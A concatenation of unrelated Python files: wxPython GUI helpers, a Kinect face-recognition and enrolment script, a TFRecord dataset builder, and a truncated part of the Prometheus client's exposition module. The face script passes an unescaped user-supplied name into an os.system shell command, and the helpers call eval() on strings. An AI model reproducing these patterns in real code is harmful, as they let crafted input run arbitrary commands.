func(v)
obj_refresh(obj)
if type(obj) is wx.ToggleButton:
button_color_change(obj)
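# Keyed enable/disable: each caller records its own boolean under a key in the
# widget's 'enabLes' dict, and the widget stays enabled only while every
# recorded value is True ('last_key' holds the key name, which is truthy and so
# does not affect all()). Hyperlinks are additionally greyed out when disabled.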
def enables_set(obj, k, en):
d = attr_getset(obj, 'enabLes', {})
d[k] = en
d['last_key'] = k
obj.Enable( all( d.values() ) )
if isinstance(obj, wx.HyperlinkCtrl):
if not hasattr(obj, 'coLor'):
obj.coLor = { True:obj.GetNormalColour(), False:'#808080' }
c = obj.coLor.get(obj.IsEnabled())
obj.SetNormalColour(c)
obj.SetVisitedColour(c)
def enables_get(obj, k, def_ret=None):
return attr_getset(obj, 'enabLes', {}).get(k, def_ret)
def enables_get_last(obj):
k = enables_get(obj, 'last_key')
return (k, enables_get(obj, k))
def obj_refresh(obj):
if type(obj) is CT.GenericTreeItem:
while obj.GetParent():
obj = obj.GetParent()
tree = obj.GetData()
tree.Refresh()
# dic_list util (push, pop, get)
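# Each key holds a stack in a plain list; illustrative usage (not from the source):
#   dic_list_push(d, 'dialog_type', 'open')   # d['dialog_type'] == ['open']
#   dic_list_get(d, 'dialog_type', 'config')  # -> 'open'
#   dic_list_pop(d, 'dialog_type')            # stack is empty again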
def dic_list_push(dic, key, v):
dic_getset(dic, key, []).append(v)
def dic_list_pop(dic, key):
dic.get(key, [None]).pop()
def dic_list_get(dic, key, def_ret=None):
return dic.get(key, [def_ret])[-1]
def bak_stk_push(dic, key):
if key in dic:
k = key + '_bak_str'
dic_getset(dic, k, []).append( dic.get(key) )
def bak_stk_pop(dic, key):
k = key + '_bak_str'
stk = dic.get(k, [])
if len(stk) > 0:
dic[key] = stk.pop()
else:
del dic[key]
def bak_stk_set(dic, key, v):
bak_stk_push(dic, key)
dic[key] = v
def attr_getset(obj, name, def_ret):
if not hasattr(obj, name):
setattr(obj, name, def_ret)
return getattr(obj, name)
def dic_getset(dic, key, def_ret):
if key not in dic:
dic[key] = def_ret
return dic.get(key)
def lst_append_once(lst, v):
exist = v in lst
if not exist:
lst.append(v)
return exist
def lst_remove_once(lst, v):
exist = v in lst
if exist:
lst.remove(v)
return exist
def get_top(lst, def_ret=None):
return lst[0] if len(lst) > 0 else def_ret
def adjust_num_str(s):
if '.' in s:
while s[-1] == '0':
s = s[:-1]
if s[-1] == '.':
s = s[:-1]
return s
def rtmgr_src_dir():
return os.path.abspath(os.path.dirname(__file__)) + "/"
def path_expand_cmd(path):
lst = path.split('/')
s = lst[0]
if s[:2] == '$(' and s[-1] == ')':
cmd = s[2:-1].split(' ')
lst[0] = subprocess.check_output(cmd).strip()
path = '/'.join(lst)
return path
def eval_if_str(self, v):
return eval(v) if type(v) is str else v
def dic_eval_if_str(self, dic, key, def_ret=None):
return eval_if_str( self, dic.get(key, def_ret) )
def prn_dict(dic):
for (k,v) in dic.items():
print (k, ':', v)
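# Send a YAML-encoded order to the external process manager over its UNIX
# socket; the manager replies with a status and the helpers below
# (set_process_nice, set_process_cpu_affinity, set_scheduling_policy,
# shutdown_proc_manager) return True on success, False otherwise.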
def send_to_proc_manager(order):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(PROC_MANAGER_SOCK)
except socket.error:
print('Failed connect to {}'.format(PROC_MANAGER_SOCK))
return False
sock.send(yaml.dump(order))
ret = sock.recv(1024)
sock.close()
return int(ret) == 0
def set_process_nice(proc, value):
order = {
"name": "nice",
"pid": proc.pid,
"nice": value
}
return send_to_proc_manager(order)
def set_process_cpu_affinity(proc, cpus):
order = {
"name": "cpu_affinity",
"pid": proc.pid,
"cpus": cpus,
}
return send_to_proc_manager(order)
def shutdown_proc_manager():
order = {
"name": "shutdown",
}
return send_to_proc_manager(order)
def set_scheduling_policy(proc, policy, priority):
order = {
"name": "scheduling_policy",
"pid": proc.pid,
"policy": policy,
"priority": priority,
}
return send_to_proc_manager(order)
def get_cpu_count():
try:
return psutil.NUM_CPUS
except AttributeError:
return psutil.cpu_count()
class DetailDialog(wx.Dialog):
def __init__(self, parent):
wx.Dialog.__init__(self, parent, title="modal window", size=(370, 260))
panel = wx.Panel(self, wx.ID_ANY)
layout = wx.BoxSizer(wx.VERTICAL)
self.filename = os.getcwd() + "/src/util/packages/data_preprocessor/scripts/32db.yaml"
self.tc2 = wx.TextCtrl(panel, wx.ID_ANY, self.filename, style=1024)
self.tc2.SetMinSize((300, 29))
self.Bind(wx.EVT_TEXT_ENTER, self.update_path, self.tc2)
ref = wx.Button(panel, wx.ID_ANY, 'Ref')
self.Bind(wx.EVT_BUTTON, self.open_dialog, ref)
ref.SetMinSize((40,29))
self.dir = ""
sb = wx.StaticBox(panel, wx.ID_ANY, "Spam, spam, spam")
sb.SetLabel("Lidar's Calibration File")
layout1 = wx.StaticBoxSizer(sb, wx.HORIZONTAL)
layout1.Add(self.tc2, 0, wx.ALL, 4)
layout1.Add(ref, 0, wx.ALL, 4)
layout.Add(layout1)
button = wx.Button(panel, wx.ID_ANY, "OK")
button2 = wx.Button(panel, wx.ID_ANY, "Cancel")
ch1 = wx.CheckBox(panel, wx.ID_ANY, "Velodyne HDL-64e-S2")
ch2 = wx.CheckBox(panel, wx.ID_ANY, "Velodyne HDL-64e-S3")
ch3 = wx.CheckBox(panel, wx.ID_ANY, "Velodyne HDL-32e")
ch4 = wx.CheckBox(panel, wx.ID_ANY, "Velodyne VLP-16")
ch5 = wx.CheckBox(panel, wx.ID_ANY, "Hokuyo TOP-URG")
ch6 = wx.CheckBox(panel, wx.ID_ANY, "Hokuyo 3D-URG")
self.select = ""
self.parent = parent
self.values = {ch1:1, ch2:2, ch3:3, ch4:4, ch5:5, ch6:6}
if self.parent.select:
for key, val in self.values.items():
if val == self.parent.select:
key.SetValue(1)
break
ch1.Bind(wx.EVT_CHECKBOX, self.oncheck)
ch2.Bind(wx.EVT_CHECKBOX, self.oncheck)
ch3.Bind(wx.EVT_CHECKBOX, self.oncheck)
ch4.Bind(wx.EVT_CHECKBOX, self.oncheck)
ch5.Bind(wx.EVT_CHECKBOX, self.oncheck)
ch6.Bind(wx.EVT_CHECKBOX, self.oncheck)
button.Bind(wx.EVT_BUTTON, self.button_close_OK)
button2.Bind(wx.EVT_BUTTON, self.button_close_Cancel)
sb2 = wx.StaticBox(panel, wx.ID_ANY, "Spam, spam, spam", size=(370, 150))
sb2.SetLabel("Lidar's Calibration File")
layout2 = wx.StaticBoxSizer(sb2, wx.VERTICAL)
layout2.Add(ch1)
layout2.Add(ch2)
layout2.Add(ch3)
layout2.Add(ch4)
layout2.Add(ch5)
layout2.Add(ch6)
layout.Add(layout2)
layout3 = wx.BoxSizer(wx.HORIZONTAL)
layout3.AddStretchSpacer()
layout3.Add(button, 0, wx.ALL | wx.CENTER | wx.EXPAND, 4)
layout3.Add(button2, 0, wx.ALL | wx.CENTER | wx.EXPAND, 4)
layout3.AddStretchSpacer()
layout.Add(layout3, 0, wx.ALIGN_CENTER, 0)
panel.SetSizer(layout)
def update_path(self, a):
self.filename = self.tc2.GetValue()
def open_dialog(self, ref):
dlg = wx.FileDialog(self, defaultDir=self.dir, defaultFile=self.filename)
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetDirectory() + "/" + dlg.GetFilename()
self.tc2.SetValue(self.filename)
dlg.Destroy()
def oncheck(self, event):
push = event.GetEventObject()
if push.GetValue():
for value in self.values.keys():
if value == push:
self.select = self.values[push]
else:
value.SetValue(0)
else:
push.SetValue(0)
self.select = 0
def button_close_OK(self, event):
try:
self.parent.file_path = self.tc2.GetValue()
self.parent.select = self.select
self.Close()
finally:
self.Destroy()
def button_close_Cancel(self, event):
try:
self.parent.select = 0
self.Close()
finally:
return True
if __name__ == "__main__":
gettext.install("app")
app = MyApp(0)
app.MainLoop()
|
face_reco.py
|
import face_recognition
import cv2
import kinect
import img_file_parser
import voice2text
import threading
import mc_face
import os
import tts
import db_wrapper
# Get a reference to webcam #0 (the default one)
class face_reco():
def __init__(self):
self.video_capture = cv2.VideoCapture(0)
self.db = db_wrapper.db_wrapper()
def reco(self):
temp = img_file_parser.img_parser()
name_list = temp[0]
# print(name_list)
face_encoding_list = temp[1]
age_list = temp[2]
gender_list = temp[3]
glass_list = temp[4]
# Initialize some variables
process_this_frame = True
detected = False
face_locations = []
face_encodings = []
face_names = []
while True:
# Grab a single frame of video
# ret, frame = self.video_capture.read() # Local camera
frame = kinect.get_video() # Kinect Camera
frame = cv2.resize(frame, (640, 480))
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Only process every other frame of video to save time
if process_this_frame:
face_locations = []
face_encodings = []
face_names = []
face_ages = []
face_gender = []
face_glasses = []
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(small_frame)
face_encodings = face_recognition.face_encodings(small_frame, face_locations)
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
match = face_recognition.compare_faces(face_encoding_list, face_encoding, tolerance=0.5)
name = "Unknown"
age = "unknown"
gender = "unknown"
glass = "unknown"
try:
matchingFace = match.index(True)
except ValueError:
matchingFace = -1
faceLength = len(match)
if matchingFace == -1:
if detected:
print("New face found, please say your name for the record\n")
tts.tts("New face found, Say your name!")
#
# largeNewName = voice2text()
# t = voice2text()
# x = threading.Thread(target=t.v2t)
# x.start()
largeNewName = ""
t = voice2text.voice2text()
try:
largeNewName = t.v2t()
except:
tts.tts("Timeout")
largeNewName = "x"
largeNewName = raw_input("Input your name: ")
# largeNewName = "Michael"
detected = False
if not largeNewName == "X" and not largeNewName == "x":
name_list.append(largeNewName)
face_encoding_list.append(face_encoding)
indi = face_encodings.index(face_encoding)
(top, right, bottom, left) = face_locations[indi]
roi = frame[int(top * 4 * 0.7): min(int(bottom * 4 * 1.4) , 480), int(left *4 * 0.7):min(int(right*4*1.4), 640)]
# print(type(roi))
ct = self.db.name_count(largeNewName)
cv2.imwrite(largeNewName + str(ct + 1) + ".jpg", roi)
os.system("cp \"" + largeNewName + str(ct + 1) + ".jpg\"" + " ../HackGT/yilun/static/Portrait/")
temp_specs = mc_face.analyse(largeNewName +str(ct + 1)+ ".jpg")
if not len(temp_specs) == 0:
age_list.append(temp_specs[0])
gender_list.append(temp_specs[1])
glass_list.append(temp_specs[2])
try:
self.db.add_person_full(largeNewName, largeNewName + str(ct + 1), temp_specs[0],
temp_specs[1] == "Male", temp_specs[2] == "ReaderGlasses")
except:
pass
else:
age_list.append(99)
gender_list.append("UNKNOWN")
glass_list.append("UNKNOWN")
try:
self.db.add_person(largeNewName, largeNewName + str(ct + 1))
except:
pass
else:
detected = True
else:
name = name_list[matchingFace]
if(len(age_list) > 0):
age = age_list[matchingFace]
gender = gender_list[matchingFace]
glass = glass_list[matchingFace]
detected = False
face_names.append(name)
face_ages.append(age)
face_gender.append(gender)
face_glasses.append(glass)
process_this_frame = not process_this_frame
k = 0
# Display the results
for (top, right, bottom, left), name1 in zip(face_locations, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
age1 = face_ages[k]
gender1 = face_gender[k]
glass1 = face_glasses[k]
k = k + 1
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# # Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom + 40), (0, 0, 255), 2)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name1, (left + 6, bottom - 6), font, 1, (0, 255, 0), 1)
cv2.putText(frame, str(age1), (left + 6, bottom + 16), font, 0.4, (0, 255, 0), 1)
cv2.putText(frame, gender1, (left + 6, bottom + 27), font, 0.4, (0, 255, 0), 1)
cv2.putText(frame, glass1, (left + 6, bottom + 38), font, 0.4, (0, 255, 0), 1)
# Display the resulting image
# cv2.putText(frame,"What's your name?",(320,240),cv2.FONT_HERSHEY_DUPLEX,1,(0, 255, 0), 1)
cv2.imshow('Video', frame)
cv2.imwrite("static/Stream.jpg", frame)
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
if __name__ == "__main__" :
r = face_reco()
# # r.start()
r.reco()
# Release handle to the webcam
# r = face_reco()
# # r.start()
# r.reco()
# video_capture.release()
# cv2.destroyAllWindows()
|
create_tfrecords.py
|
"""
Create the tfrecord files for a dataset.
This script is taken from the Visipedia repo: https://github.com/visipedia/tfrecords
A lot of this code comes from the tensorflow inception example, so here is their license:
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
import argparse
from datetime import datetime
import hashlib
import json
import os
from queue import Queue
import random
import sys
import threading
import numpy as np
import tensorflow as tf
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def _validate_text(text):
"""If text is not str or unicode, then try to convert it to str."""
if isinstance(text, str):
return text.encode()
else:
return str(text).encode()
def _str_and_encode(value):
return str(value).encode()
def _convert_to_example(image_example, image_buffer, height, width, colorspace='RGB',
channels=3, image_format='JPEG'):
"""Build an Example proto for an example.
Args:
image_example: dict, an image example
image_buffer: string, JPEG encoding of RGB image
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
# Required
filename = str(image_example['filename']).encode() # default encoding='utf-8'
image_id = str(image_example['id']).encode()
# Class label for the whole image
image_class = image_example.get('class', {})
class_label = image_class.get('label', 0)
class_text = _validate_text(image_class.get('text', ''))
class_conf = image_class.get('conf', 1.)
# Objects
image_objects = image_example.get('object', {})
object_count = image_objects.get('count', 0)
# Bounding Boxes
image_bboxes = image_objects.get('bbox', {})
xmin = image_bboxes.get('xmin', [])
xmax = image_bboxes.get('xmax', [])
ymin = image_bboxes.get('ymin', [])
ymax = image_bboxes.get('ymax', [])
bbox_scores = image_bboxes.get('score', [])
bbox_labels = image_bboxes.get('label', [])
bbox_text = list(map(_validate_text, image_bboxes.get('text', [])))
bbox_label_confs = image_bboxes.get('conf', [])
# Parts
image_parts = image_objects.get('parts', {})
parts_x = image_parts.get('x', [])
parts_y = image_parts.get('y', [])
parts_v = image_parts.get('v', [])
parts_s = image_parts.get('score', [])
# Areas
object_areas = image_objects.get('area', [])
# Ids
object_ids = list(map(_str_and_encode, image_objects.get('id', [])))
# Any extra data (e.g. stringified json)
extra_info = str(image_class.get('extra', '')).encode()
# Additional fields for the format needed by the Object Detection repository
key = hashlib.sha256(image_buffer).hexdigest().encode()
is_crowd = image_objects.get('is_crowd', [])
# For explanation of the fields, see https://github.com/visipedia/tfrecords
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace.encode()),
'image/channels': _int64_feature(channels),
'image/format': _bytes_feature(image_format.encode()),
'image/filename': _bytes_feature(filename),
'image/id': _bytes_feature(image_id),
'image/encoded': _bytes_feature(image_buffer),
'image/extra': _bytes_feature(extra_info),
'image/class/label': _int64_feature(class_label),
'image/class/text': _bytes_feature(class_text),
'image/class/conf': _float_feature(class_conf),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature(bbox_labels),
'image/object/bbox/text': _bytes_feature(bbox_text),
'image/object/bbox/conf': _float_feature(bbox_label_confs),
'image/object/bbox/score' : _float_feature(bbox_scores),
'image/object/parts/x' : _float_feature(parts_x),
'image/object/parts/y' : _float_feature(parts_y),
'image/object/parts/v' : _int64_feature(parts_v),
'image/object/parts/score' : _float_feature(parts_s),
'image/object/count' : _int64_feature(object_count),
'image/object/area' : _float_feature(object_areas),
'image/object/id' : _bytes_feature(object_ids),
# Additional fields for the format needed by the Object Detection repository
'image/source_id': _bytes_feature(image_id),
'image/key/sha256': _bytes_feature(key),
'image/object/class/label': _int64_feature(bbox_labels),
'image/object/class/text': _bytes_feature(bbox_text),
'image/object/is_crowd': _int64_feature(is_crowd)
}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
# Convert the image data from png to jpg
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
# Decode the image data as a jpeg image
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3, "JPEG needs to have height x width x channels"
assert image.shape[2] == 3, "JPEG needs to have 3 channels (RGB)"
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
_, file_extension = os.path.splitext(filename)
return file_extension.lower() == '.png'
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'rb').read() # changed to 'rb' per https://github.com/tensorflow/tensorflow/issues/11312
# Clean the dirty data.
if _is_png(filename):
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, output_directory,
dataset, num_shards, store_images, error_queue):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set (e.g. `train` or `test`)
output_directory: string, file path to store the tfrecord files.
dataset: list, a list of image example dicts
num_shards: integer number of shards for this data set.
store_images: bool, should the image be stored in the tfrecord
error_queue: Queue, a queue to place image examples that failed.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
error_counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
image_example = dataset[i]
filename = str(image_example['filename'])
try:
if store_images:
if 'encoded' in image_example:
image_buffer = image_example['encoded']
height = image_example['height']
width = image_example['width']
colorspace = image_example['colorspace']
image_format = image_example['format']
num_channels = image_example['channels']
example = _convert_to_example(image_example, image_buffer, height,
width, colorspace, num_channels,
image_format)
else:
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(image_example, image_buffer, height,
width)
else:
image_buffer=''
height = int(image_example['height'])
width = int(image_example['width'])
example = _convert_to_example(image_example, image_buffer, height,
width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
except Exception as e:
#raise
print('Exception in making example for {}.'.format(i))
print('Filename: {}'.format(filename))
error_counter += 1
error_msg = repr(e)
image_example['error_msg'] = error_msg
error_queue.put(image_example)
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch, with %d errors.' %
(datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
sys.stdout.flush()
print('%s [thread %d]: Wrote %d images to %s, with %d errors.' %
(datetime.now(), thread_index, shard_counter, output_file, error_counter))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards, with %d errors.' %
(datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
sys.stdout.flush()
def create(dataset, dataset_name, output_directory, num_shards, num_threads, shuffle=True, store_images=True):
"""Create the tfrecord files to be used to train or test a model.
Args:
dataset : [{
"filename" : <REQUIRED: path to the image file>,
"id" : <REQUIRED: id of the image>,
"class" : {
"label" : <[0, num_classes)>,
"text" : <text description of class>
},
"object" : {
"bbox" : {
"xmin" : [],
"xmax" : [],
"ymin" : [],
"ymax" : [],
"label" : []
}
}
}]
dataset_name: a name for the dataset
output_directory: path to a directory to write the tfrecord files
num_shards: the number of tfrecord files to create
num_threads: the number of threads to use
shuffle : bool, should the image examples be shuffled or not prior to creating the tfrecords.
Returns:
list : a list of image examples that failed to process.
"""
# Images in the tfrecords set must be shuffled properly
if shuffle:
random.shuffle(dataset)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(dataset), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
# A Queue to hold the image examples that fail to process.
error_queue = Queue()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, dataset_name, output_directory, dataset,
num_shards, store_images, error_queue)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(dataset)))
# Collect the errors
errors = []
while not error_queue.empty():
errors.append(error_queue.get())
print('%d examples failed.' % (len(errors),))
return errors
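# Hedged usage sketch (not in the original script): build a minimal dataset in the format
# documented above and write it out. The file path, id and output directory are placeholders.
def _example_create_tfrecords():
    dataset = [{
        "filename": "/path/to/images/0001.jpg",  # placeholder image path
        "id": "0001",
        "class": {"label": 0, "text": "dog"},
        "object": {
            "count": 1,
            "bbox": {
                "xmin": [0.1], "xmax": [0.9],
                "ymin": [0.2], "ymax": [0.8],
                "label": [0],
            },
        },
    }]
    failed = create(dataset=dataset, dataset_name='train',
                    output_directory='/tmp/tfrecords',  # placeholder output directory
                    num_shards=1, num_threads=1, shuffle=False, store_images=True)
    print('%d examples failed' % len(failed))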
def parse_args():
parser = argparse.ArgumentParser(description='Basic statistics on tfrecord files')
parser.add_argument('--dataset_path', dest='dataset_path',
help='Path to the dataset json file.', type=str,
required=True)
parser.add_argument('--prefix', dest='dataset_name',
help='Prefix for the tfrecords (e.g. `train`, `test`, `val`).', type=str,
required=True)
parser.add_argument('--output_dir', dest='output_dir',
help='Directory for the tfrecords.', type=str,
required=True)
parser.add_argument('--shards', dest='num_shards',
help='Number of shards to make.', type=int,
required=True)
parser.add_argument('--threads', dest='num_threads',
help='Number of threads to make.', type=int,
required=True)
parser.add_argument('--shuffle', dest='shuffle',
help='Shuffle the records before saving them.',
required=False, action='store_true', default=False)
parser.add_argument('--store_images', dest='store_images',
help='Store the images in the tfrecords.',
required=False, action='store_true', default=False)
parsed_args = parser.parse_args()
return parsed_args
def main():
args = parse_args()
with open(args.dataset_path) as f:
dataset = json.load(f)
errors = create(
dataset=dataset,
dataset_name=args.dataset_name,
output_directory=args.output_dir,
num_shards=args.num_shards,
num_threads=args.num_threads,
shuffle=args.shuffle,
store_images=args.store_images
)
return errors
if __name__ == '__main__':
main()
|
exposition.py
|
import base64
from contextlib import closing
from http.server import BaseHTTPRequestHandler
import os
import socket
from socketserver import ThreadingMixIn
import sys
import threading
from urllib.error import HTTPError
from urllib.parse import parse_qs, quote_plus, urlparse
from urllib.request import (
build_opener, HTTPHandler, HTTPRedirectHandler, Request,
)
from wsgiref.simple_server import make_server, WSGIRequestHandler, WSGIServer
from .openmetrics import exposition as openmetrics
from .registry import REGISTRY
from .utils import floatToGoString
__all__ = (
'CONTENT_TYPE_LATEST',
'delete_from_gateway',
'generate_latest',
'instance_ip_grouping_key',
'make_asgi_app',
'make_wsgi_app',
'MetricsHandler',
'push_to_gateway',
'pushadd_to_gateway',
'start_http_server',
'start_wsgi_server',
'write_to_textfile',
)
CONTENT_TYPE_LATEST = 'text/plain; version=0.0.4; charset=utf-8'
"""Content type of the latest text format"""
PYTHON376_OR_NEWER = sys.version_info > (3, 7, 5)
class _PrometheusRedirectHandler(HTTPRedirectHandler):
"""
Allow additional methods (e.g. PUT) and data forwarding in redirects.
Use of this class constitutes a user's explicit agreement to the
redirect responses the Prometheus client will receive when using it.
You should only use this class if you control or otherwise trust the
redirect behavior involved and are certain it is safe to fully transfer
the original request (method and data) to the redirected URL. For
example, if you know there is a cosmetic URL redirect in front of a
local deployment of a Prometheus server, and all redirects are safe,
this is the class to use to handle redirects in that case.
The standard HTTPRedirectHandler does not forward request data nor
does it allow redirected PUT requests (which Prometheus uses for some
operations, for example `push_to_gateway`) because these cannot
generically guarantee no violations of HTTP RFC 2616 requirements for
the user to explicitly confirm redirects that could have unexpected
side effects (such as rendering a PUT request non-idempotent or
creating multiple resources not named in the original request).
"""
def redirect_request(self, req, fp, code, msg, headers, newurl):
"""
Apply redirect logic to a request.
See parent HTTPRedirectHandler.redirect_request for parameter info.
If the redirect is disallowed, this raises the corresponding HTTP error.
If the redirect can't be determined, return None to allow other handlers
to try. If the redirect is allowed, return the new request.
This method specialized for the case when (a) the user knows that the
redirect will not cause unacceptable side effects for any request method,
and (b) the user knows that any request data should be passed through to
the redirect. If either condition is not met, this should not be used.
"""
# note that requests being provided by a handler will use get_method to
# indicate the method, by monkeypatching this, instead of setting the
# Request object's method attribute.
m = getattr(req, "method", req.get_method())
if not (code in (301, 302, 303, 307) and m in ("GET", "HEAD")
or code in (301, 302, 303) and m in ("POST", "PUT")):
raise HTTPError(req.full_url, code, msg, headers, fp)
new_request = Request(
newurl.replace(' ', '%20'), # space escaping in new url if needed.
headers=req.headers,
origin_req_host=req.origin_req_host,
unverifiable=True,
data=req.data,
)
new_request.method = m
return new_request
def _bake_output(registry, accept_header, params):
"""Bake output for metrics output."""
encoder, content_type = choose_encoder(accept_header)
if 'name[]' in params:
registry = registry.restricted_registry(params['name[]'])
output = encoder(registry)
return '200 OK', ('Content-Type', content_type), output
def make_wsgi_app(registry=REGISTRY):
"""Create a WSGI app which serves the metrics from a registry."""
def prometheus_app(environ, start_response):
# Prepare parameters
accept_header = environ.get('HTTP_ACCEPT')
params = parse_qs(environ.get('QUERY_STRING', ''))
if environ['PATH_INFO'] == '/favicon.ico':
# Serve empty response for browsers
status = '200 OK'
header = ('', '')
output = b''
else:
# Bake output
status, header, output = _bake_output(registry, accept_header, params)
# Return output
start_response(status, [header])
return [output]
return prometheus_app
class _SilentHandler(WSGIRequestHandler):
"""WSGI handler that does not log requests."""
def log_message(self, format, *args):
"""Log nothing."""
class ThreadingWSGIServer(ThreadingMixIn, WSGIServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
daemon_threads = True
def start_wsgi_server(port, addr='', registry=REGISTRY):
"""Starts a WSGI server for prometheus metrics as a daemon thread."""
app = make_wsgi_app(registry)
httpd = make_server(addr, port, app, ThreadingWSGIServer, handler_class=_SilentHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
start_http_server = start_wsgi_server
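# Hedged usage sketch (not part of this module): expose metrics over HTTP with the WSGI
# server above. Counter lives elsewhere in the prometheus_client package and is only
# assumed here for illustration; the port is arbitrary.
def _example_start_metrics_server():
    from prometheus_client import Counter
    requests_total = Counter('myapp_requests_total', 'Requests handled')
    start_http_server(8000)  # metrics now served on http://localhost:8000/
    requests_total.inc()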
def generate_latest(registry=REGISTRY):
"""Returns the metrics from the registry in latest text format as a string."""
def sample_line(line):
if line.labels:
labelstr = '{{{0}}}'.format(','.join(
['{}="{}"'.format(
k, v.replace('\\', r'\\').replace('\n', r'\n').replace('"', r'\"'))
for k, v in sorted(line.labels.items())]))
else:
labelstr = ''
timestamp = ''
if line.timestamp is not None:
# Convert to milliseconds.
timestamp = f' {int(float(line.timestamp) * 1000):d}'
return f'{line.name}{labelstr} {floatToGoString(line.value)}{timestamp}\n'
output = []
for metric in registry.collect():
try:
mname = metric.name
mtype = metric.type
